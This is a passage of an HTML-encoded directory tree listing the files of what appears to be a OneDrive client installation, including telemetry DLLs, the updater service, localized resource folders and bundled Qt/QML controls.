&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; OneDriveTelemetryExperimental.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; OneDriveTelemetryStable.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; OneDriveUpdaterService.exe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; or-IN
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FileSync.LocalizedResources.dll.mui
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; localizable.json
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; pa
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FileSync.LocalizedResources.dll.mui
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; localizable.json
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; pa-Arab-PK
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FileSync.LocalizedResources.dll.mui
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; localizable.json
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; pl
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FileSync.LocalizedResources.dll.mui
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; localizable.json
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; platforms
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; qwindows.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; pt-BR
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FileSync.LocalizedResources.dll.mui
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; localizable.json
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; pt-PT
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FileSync.LocalizedResources.dll.mui
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; localizable.json
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; qml
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FabExMDL2.ttf
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; QtQml
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Models.2
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; modelsplugin.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; plugins.qmltypes
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; qmldir
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; plugins.qmltypes
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; qmldir
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; qmlplugin.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; QtQuick
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Controls
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ApplicationWindow.qml
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; plugins.qmltypes
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Private
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; BasicTableView.qml
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; CalendarUtils.js
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FocusFrame.qml
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; qmldir
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ScrollBar.qml
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ScrollViewHelper.qml
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; StackView.js
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; style.js
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Style.qml
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SystemPaletteSingleton.qml
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; TableViewItemDelegateLoader.qml
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; TextSingleton.qml
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; TreeViewItemDelegateLoader.qml
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; qmldir
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; qtquickcontrolsplugin.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ScrollView.qml
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Styles
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Base
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; BasicTableViewStyle.qml
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ScrollViewStyle.qml
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; TreeViewStyle.qml
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Flat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; qmldir
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; qtquickextrasflatplugin.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; qmldir
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; TableViewColumn.qml
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; TreeView.qml
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Controls.2
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Button.qml
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; CheckBox.qml
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ComboBox.qml
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; DialogButtonBox.qml
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Dialog.qml
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ItemDelegate.qml
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Label.qml
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; MenuItem.qml
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Menu.qml
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; plugins.qmltypes
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Popup.qml
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ProgressBar.qml
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; qmldir
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; qtquickcontrols2plugin.dll
